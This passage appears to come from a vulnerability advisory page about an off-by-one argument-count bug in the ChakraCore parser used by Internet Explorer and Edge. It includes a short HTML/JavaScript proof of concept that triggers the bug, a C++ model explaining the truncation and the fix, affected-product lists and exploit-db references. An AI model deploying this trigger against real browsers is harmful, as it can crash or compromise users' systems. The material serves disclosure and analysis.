(*lastNodeRef)->ichLim; } return pnodeList; } --> <html> <head> <title> POC </title> </head> <script> var a=[]; a.length=0xFFFF+1; a.fill('...a'); var b="function Car(){}; var car=new Car("+a.join()+");"; //alert(b); eval(b); </script> </html>
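The off-by-one the analysis above points at, reduced to the counting logic so it can be stepped through. This is an added model written for this page, not ChakraCore code: the loop check, the `++count` and the narrowing `static_cast<uint16>` are reproduced, while argument parsing and AST building are left out. `Mode`, `ArgListResult`, `count_args` and `count_mismatch` are this example's own names. It compares the original `>` check with the corrected `>=` check at the three interesting argument counts: 0xFFFF, 0x10000 (the PoC's `a.length`) and 0x10001.

```cpp
#include <cstdint>
#include <limits>

// Added model of the argument-counting loop in Parser::ParseArgList
// (not ChakraCore code). Mode selects the original or the corrected check.
enum class Mode { Vulnerable, Fixed };

struct ArgListResult {
    bool errored;        // true when the parser would have raised ERRnoMemory
    int rawCount;        // the int counter just before the narrowing cast
    std::uint16_t count; // what *pCount receives after static_cast<uint16>
};

// Walks numArgs comma-separated arguments the way the parser loop does:
// the limit check runs before each argument is consumed, then the counter
// is incremented. Only the counting is modelled; no nodes are built.
ArgListResult count_args(unsigned numArgs, Mode mode) {
    const unsigned limit = std::numeric_limits<std::uint16_t>::max(); // 0xffff
    int count = 0;
    for (unsigned i = 0; i < numArgs; ++i) {
        unsigned c = static_cast<unsigned>(count);
        bool tooMany = (mode == Mode::Vulnerable)
                           ? (c > limit)   // original check: lets count reach 0x10000
                           : (c >= limit); // corrected check: rejects the 0x10000th argument
        if (tooMany) {
            return {true, count, 0};
        }
        ++count;
    }
    // The narrowing cast is where 0x10000 silently becomes 0.
    return {false, count, static_cast<std::uint16_t>(count)};
}

// True when the parser accepts the list but the stored uint16 no longer
// matches the number of arguments it consumed: the inconsistency between
// *pCount and the node list that the bytecode emitter later trips over.
bool count_mismatch(unsigned numArgs, Mode mode) {
    ArgListResult r = count_args(numArgs, mode);
    return !r.errored && static_cast<unsigned>(r.count) != numArgs;
}

int main() {
    // 0xFFFF arguments: both variants accept and store 0xFFFF.
    // 0x10000 arguments: the original stores 0, the fix raises ERRnoMemory.
    // 0x10001 arguments: both variants raise ERRnoMemory.
    bool original_is_inconsistent = count_mismatch(0x10000, Mode::Vulnerable);
    bool fix_is_consistent = !count_mismatch(0x10000, Mode::Fixed) &&
                             !count_mismatch(0xFFFF, Mode::Fixed);
    return (original_is_inconsistent && fix_is_consistent) ? 0 : 1;
}
```

With the original check the 0x10000th argument is consumed because the test runs before the increment and `count` is still 0xFFFF at that point; the value 0x10000 is then truncated to 0 when stored, so the emitter sees an argument count of zero for a list that holds 65536 nodes. Moving to `>=` makes the parser stop while `count` is still representable, which is the whole fix: any later consumer of `*pCount` can then trust that it equals the number of nodes it receives.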

Products Mentioned

Configuration 0

Microsoft>>Internet_explorer >> Version 10

Microsoft>>Windows_server_2012 >> Version -

Configuration 0

Microsoft>>Internet_explorer >> Version 11

Microsoft>>Windows_10 >> Version -

Microsoft>>Windows_10 >> Version 1511

Microsoft>>Windows_10 >> Version 1607

Microsoft>>Windows_10 >> Version 1703

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_8.1 >> Version -

Microsoft>>Windows_rt_8.1 >> Version -

Microsoft>>Windows_server_2008 >> Version r2

Microsoft>>Windows_server_2012 >> Version r2

Microsoft>>Windows_server_2016 >> Version -

Configuration 0

Microsoft>>Internet_explorer >> Version 9

Microsoft>>Windows_server_2008 >> Version -

Configuration 0

Microsoft>>Edge >> Version -

Microsoft>>Windows_10 >> Version -

Microsoft>>Windows_10 >> Version 1511

Microsoft>>Windows_10 >> Version 1607

Microsoft>>Windows_10 >> Version 1703

Microsoft>>Windows_server_2016 >> Version -

References

http://www.securityfocus.com/bid/100056
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/42466/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/42467/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/42468/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securitytracker.com/id/1039095
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securitytracker.com/id/1039094
Tags : vdb-entry, x_refsource_SECTRACK
https://www.exploit-db.com/exploits/42478/
Tags : exploit, x_refsource_EXPLOIT-DB